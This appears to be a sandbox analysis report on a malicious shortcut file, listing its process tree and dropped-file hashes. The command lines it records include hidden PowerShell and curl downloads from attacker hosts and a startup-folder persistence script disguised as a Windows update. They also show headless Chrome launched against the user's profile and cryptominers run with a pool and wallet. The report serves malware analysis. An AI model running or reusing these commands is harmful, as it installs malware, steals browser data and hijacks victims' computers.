PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -URI https://sealingshop.click/bat/encode/bostar1_en.txt?info=df345rs -OutFile C:/Users/Public/img.bat;powershell C:/Users/Public/img.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:/Users/Public/img.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\img.bat""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://google.com/

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaa8de46f8,0x7ffaa8de4708,0x7ffaa8de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1

C:\Windows\system32\curl.exe

curl https://sealingshop.click/app/python39.zip -o "C:\\Users\\Public\\python39\\python39.zip"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden Expand-Archive C:\\Users\\Public\\python39\\python39.zip -DestinationPath C:\\Users\\Public\\python39

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Windows\system32\curl.exe

curl https://sealingshop.click/py/bostar1 -o "C:\\Users\\Public\\python39\\documents.py"

C:\Users\Public\python39\python.exe

C:\\Users\\Public\\python39\\python.exe "C:\\Users\\Public\\python39\\documents.py"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Public\python39\lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exe

C:\Users\Public\python39\lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exe --browser chrome --language-binding python --output json

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "wmic os get osarchitecture"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic os get osarchitecture

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "chromedriver --version"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "wmic datafile where name='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe' get Version /value"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic datafile where name='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe' get Version /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe

C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe --port=52399

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --disable-default-apps --disable-gpu --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-service-autorun --password-store=basic --profile-directory=Default --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --window-position=-10000,-10000 data:,

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa79dcc40,0x7ffaa79dcc4c,0x7ffaa79dcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --enable-logging --headless --log-level=0 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --enable-logging --log-level=0 --field-trial-handle=1480,i,358880423168502554,7210367120317983287,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1464 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-logging --log-level=0 --use-angle=swiftshader-webgl --use-gl=angle --headless --enable-logging --log-level=0 --field-trial-handle=1748,i,358880423168502554,7210367120317983287,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1744 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=2628,i,358880423168502554,7210367120317983287,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2620 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2904,i,358880423168502554,7210367120317983287,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2896 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3032,i,358880423168502554,7210367120317983287,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3028 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cmd /c mkdir "C:\Users\Public\PublicAlbums"

C:\Windows\system32\cmd.exe

cmd /c mkdir "C:\Users\Public\PublicAlbums"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/kylianjacky20241/none/-/raw/main/xmrig3.zip?inline=false -OutFile C:\Users\Public\PublicAlbums\xmrig.zip

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/kylianjacky20241/none/-/raw/main/xmrig3.zip?inline=false -OutFile C:\Users\Public\PublicAlbums\xmrig.zip

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe -windowstyle hidden Expand-Archive C:\Users\Public\PublicAlbums\xmrig.zip -DestinationPath C:\Users\Public\PublicAlbums

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden Expand-Archive C:\Users\Public\PublicAlbums\xmrig.zip -DestinationPath C:\Users\Public\PublicAlbums

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cmd /c C:\Users\Public\PublicAlbums\config.vbs

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Public\PublicAlbums\config.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\PublicAlbums\config.vbs"

C:\Users\Public\PublicAlbums\xmrig.exe

"C:\Users\Public\PublicAlbums\xmrig.exe" -o sg-zephyr.miningocean.org:5332 -u ZEPHsCVJBy21Z2qvE7JpbwDgsQCzPqyV58KWAZ2qzVYAjPh4bsjrGB7W6DkTuUy4p5Kk75dUyvBtgH3jpspeQUbnR8ZMYL7wDcV -p workerbot -a rx/0 -k --donate-level 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cmd /c mkdir "C:\Users\Public\PublicSounds"

C:\Windows\system32\cmd.exe

cmd /c mkdir "C:\Users\Public\PublicSounds"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/kylianjacky20241/none/-/raw/main/lolMiner.zip?inline=false -OutFile C:\Users\Public\PublicSounds\lolMiner.zip

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/kylianjacky20241/none/-/raw/main/lolMiner.zip?inline=false -OutFile C:\Users\Public\PublicSounds\lolMiner.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3060 /prefetch:2

Network


Files


C:\Users\Public\python39\lib\site.py

MD5 3bb224dfc8d6a10855838e0152b1cd43
SHA1 acbc584b34a1b8d5e22793e65e0bf02e4b35b0f9
SHA256 4f9546842fa59bdaf5e7196c5bc2127f97577afc953cb10fe3bc3c04fea56029
SHA512 5a4e9a752d664629a4ffb9c3baf4b9ffd6f7cfc98cc0bc7a49ff4486541851d2c89b4704753d38ba1786aa7747c6b8bc5dbe126a9b6988f216da121278aff8a8

C:\Users\Public\python39\lib\__pycache__\site.cpython-39.pyc

MD5 5e872a91c176f251fca3408b630e1854
SHA1 ce26c74a9823a32822f54cb882fa0527f0ba7192
SHA256 63245f525448505aea74fc2bfa1d6140a0f48e72c78049f28315010b1be38e26
SHA512 e355ed7567cade0c7a1ec00503fd3b14cd0a7baf3b0d3310f5b3140e969110412d88410919f747ce0bbcf72f9b070d901b5942f8c45e49f3dfcffba5c9b23f6a

C:\Users\Public\python39\lib\__pycache__\os.cpython-39.pyc

MD5 cba7a0957a1096a99a03c2cf51148835
SHA1 c90b66eb01da1ee367e23e1b0339a3d33aedcd85
SHA256 9dd94ce5d7036b6d29234791d036895b94fc57e0f5699461ab76340d99cfdc8f
SHA512 fa641f39bc021b07371e77e264d3e0e23f6076452baf7fb043c119812d6f74db7b11d8969c65f8f9e3758ca6f3fcd43c79632725a1e0ce8c495ff25cfc163536

C:\Users\Public\python39\lib\os.py

MD5 ba51ae5596c629c09d9975a5a9cccfd1
SHA1 9b33d3922cb18c89cf06299c161c51339f5893a3
SHA256 2fa6d0b04e7948d09274f28d606c63a7dd89136de320d89d165b65e8379099bd
SHA512 0a8651779fd30b2b2dd297926af6d373884c7c6fdab0a1a07088acf78be33ad9ad752392fb473f919e6d25a4cee63c65acb8b70038102988c6a8365075ea26b1

C:\Users\Public\python39\lib\stat.py

MD5 7a7143cbe739708ce5868f02cd7de262
SHA1 e915795b49b849e748cdbd8667c9c89fcdff7baf
SHA256 e514fd41e2933dd1f06be315fb42a62e67b33d04571435a4815a18f490e0f6ce
SHA512 7ecf6ac740b734d26d256fde2608375143c65608934aa51df7af34a1ee22603a790adc5b3d67d6944ba40f6f41064fa4d6957e000de441d99203755820e34d53

C:\Users\Public\python39\lib\__pycache__\stat.cpython-39.pyc

MD5 bacf6ca87d06211b5a0341c7a5cc00fc
SHA1 755fd35113b7398c62a9858f30da1f5f8fd1e71e
SHA256 9ca5f814893eb491526568e506d89e33a79b5aeaf5553075b38aa5fe84470ed0
SHA512 91c8e25a7ecf5f0c9cc1e17c22be4c421f69e1610482b55b23b93c4f30c9a751b5a91f64d52e266ec7f44cf01d050b69821db59f057ef0780fb3b4450e73b875

C:\Users\Public\python39\lib\_collections_abc.py

MD5 f8dec159a715d167a7d057d0f0f77116
SHA1 90f1ddea0bf3c5ac8475a8f136a32c3d7ea27d4b
SHA256 8c903849e5a2d8ce70f81fc785f0c03de2b82f93301427a4c3fd7030fff1510c
SHA512 50c79812ee1ce577ad86999e960a5f6b1c51caaa976e32cbc6300bff1053a12fe3372fc83d0cc8901ba6c5b3ad6156b78a3785249edff3f467543c6584832161

C:\Users\Public\python39\lib\__pycache__\_collections_abc.cpython-39.pyc

MD5 6c6794607d5396dc224c2bfd1ad541eb
SHA1 9d940d0861a862710c358d20509f95da199874e1
SHA256 73d23647789d7287b09e67675ec118b984ae4898502248148e40cfecabff619b
SHA512 c8f92c9ce175c09e79a71c494bf5625fb930aed8b54c2af0fd4a0757c6eedf61ea7cd1100913345f4db596e81e2b99b92dbbbd1ffa94268948c45004bbd3cd85

C:\Users\Public\python39\lib\__pycache__\_bootlocale.cpython-39.pyc

MD5 126b05827d8548a3a1a9697013d20822
SHA1 71cb3863a4a824a465ff63231ecf3fe261a73fed
SHA256 3c084a2cab0ba0ec86d0826243eb011533a9ab20caa7d92d9021f74ef2383eb4
SHA512 c7fb7f981a56171b2c27bdf87e929544c460694441cb53e8ff2764b0f8b762fcb0eda2ecfb110bc65302a03acbb5b8b57e35741d82ec55c6e27afe04131cd493

C:\Users\Public\python39\lib\_bootlocale.py

MD5 f8b749a164c1d2d609bd1d8f3b373401
SHA1 82321e3ba1a8a767418894841792d974a443abba
SHA256 77742b69385a221c4c41854e851d4c3ece387c8edaeed30ca8d2a066d12397ee
SHA512 394c4e2bae2042d40b7763096912e23878163a51cfde6a7539e1fa4add7073b0e08742cf386b6cb703c027ac06d30a5280c5caca83e69a8308ecaac858a3bbb5

C:\Users\Public\python39\lib\site-packages\distutils-precedence.pth

MD5 c39367750a2ad85b290fa7595d4cc457
SHA1 4e2b7b413113994e4730efe03e564a84cebe2d73
SHA256 7ea7ffef3fe2a117ee12c68ed6553617f0d7fd2f0590257c25c484959a3b7373
SHA512 40e5b4813f24601ad581c93fa0115454ef89e61f6b911644e3b89946280ff97cbd46ae00287d8dc71392ef6c940ebaa173d2e3c32df72f0aa27d65ed73fe37c1

C:\Users\Public\python39\lib\__pycache__\_sitebuiltins.cpython-39.pyc

MD5 68d21242999d52742bf33108c95f4aff
SHA1 587e4db1c97fe920b8171cc16f7784a1c3c6d23a
SHA256 f1a2146bea2ed3cf8c02644852120049f5a00608c9605c60417f9e87742eb9c8
SHA512 14c877adf2253fc73cc9fe22a849e014961301325b8a230096a5d0240d7742e72df3faa2a35ce6b1c9edfd4390936c49e680fa75536e24b892cf6cad8d8abccd

C:\Users\Public\python39\lib\_sitebuiltins.py

MD5 385fa756146827f7cf8d0cd67db9f4e8
SHA1 11121d9dc26c3524d54d061054fa2eeafd87a6f4
SHA256 f7d3f4f4fa0290e861b2eaeb2643ffaf65b18ab7e953143eafa18b7ec68dbf59
SHA512 23369ba61863f1ebe7be138f6666619eaabd67bb055c7f199b40a3511afe28758096b1297a14c84f5635178a309b9f467a644c096951cb0961466c629bf9e77c

C:\Users\Public\python39\lib\__pycache__\base64.cpython-39.pyc

MD5 a107acf6a2a72d4da038afa628302f5c
SHA1 39d53a44be4c1dceea1e390e5c23bf8b8ea4cc83
SHA256 52cb9f46e9418aa5a8d0fafe25f033c5d1f3975466352f315f532e2aae207484
SHA512 bc98d3d85d33368b865ba52a605919c7fe9bd6295ee9018a33a2658f7a1cbf67c7f8ea936f01ad54f886f76a26821b14500f93630ba53d17f95ba404ba0ebfa6

C:\Users\Public\python39\lib\base64.py

MD5 e5e0d6a54e784c0764c53c68dc34c105
SHA1 b8acb75319564350cbb2a880b7e5559b5cebfd90
SHA256 b7defe125772bd569cffeb540265656be6e017b516c5c3ae1aa0bb66ddbd9f74
SHA512 dd8d3e57a359106f61b0fc705ace159b128c6156dea8047dba41d538334952a99d445e7432e252116d68dd500821d2466d7db13145cf5fd6c0a6f0d27b517af3

C:\Users\Public\python39\documents.py

MD5 5d8c3f38a7ae3d542ae84255ee55cbeb
SHA1 803af1245bdc29eb1d6f5df508b150e285c2ef04
SHA256 6f886d7ec026fb64a099c8d4f717a6c26cfcb60233faf1b145ca73260ce86253
SHA512 c7639d0d4a0caca7ec46b26b236f3a82b9d72e9b587045f4b99d3c37c196403da6e0e087950bee8d2364a40ef950f9ef6079b7967ba490467c8334d9326462e8

C:\Users\Public\python39\lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-39.pyc

MD5 b8688685204e2cb37a59755dc273a5c0
SHA1 c256511469ce898ff020a8f1973953af23f7caca
SHA256 3cebb2aef81c89769044399b5c0fb09fe8cbdb3ef5eb1d0dba9c825fd7fc1399
SHA512 a8ef986caf0fe1880fbb279ad1c1161229e76ab88a75e639e5f3adc30ac875916a4a81b7805930b00c523d1bb0753ab4ccbecb4d17a8fd5506443dd85d6ae90c

C:\Users\Public\python39\lib\site-packages\win32\lib\pywin32_bootstrap.py

MD5 5d28a84aa364bcd31fdb5c5213884ef7
SHA1 0874dca2ad64e2c957b0a8fd50588fb6652dd8ee
SHA256 e298ddcfcb0232257fcaa330844845a4e7807c4e2b5bd938929ed1791cd9d192
SHA512 24c1ad9ce1d7e7e3486e8111d8049ef1585cab17b97d29c7a4eb816f7bdf34406aa678f449f8c680b7f8f3f3c8bc164edac95ccb15da654ef9df86c5beb199a5

C:\Users\Public\python39\lib\site-packages\pywin32.pth

MD5 322bf8d4899fb978d3fac34de1e476bb
SHA1 467808263e26b4349a1faf6177b007967fbc6693
SHA256 4f67ff92af0ea38bf18ac308efd976f781d84e56f579c603ed1e8f0c69a17f8d
SHA512 d7264690d653ac6ed4b3d35bb22b963afc53609a9d14187a4e0027528b618c224ed38e225330ceae2565731a4e694a6146b3214b3dcee75b053c8ae79f24a9dd

C:\Users\Public\python39\lib\__pycache__\genericpath.cpython-39.pyc

MD5 087afc6ea5f90fa3f7fd2fcf31f749e5
SHA1 996f8d59b9f0e7a395d23fc567e96ea5922673d2
SHA256 922c5242390e1a9b0123a26aaaa215bcf890fcc27cdb842c206a3491f6286a20
SHA512 dcf25815c05b6ae285d10133d52b20e87d25c4a0f469af514c125bb64633450feb69a17571d07157efca1db96b4a7ca8514cc2fc3c1be895735322c0f1b50f73

C:\Users\Public\python39\lib\genericpath.py

MD5 5ad610407613defb331290ee02154c42
SHA1 3ff9028bdf7346385607b5a3235f5ff703bcf207
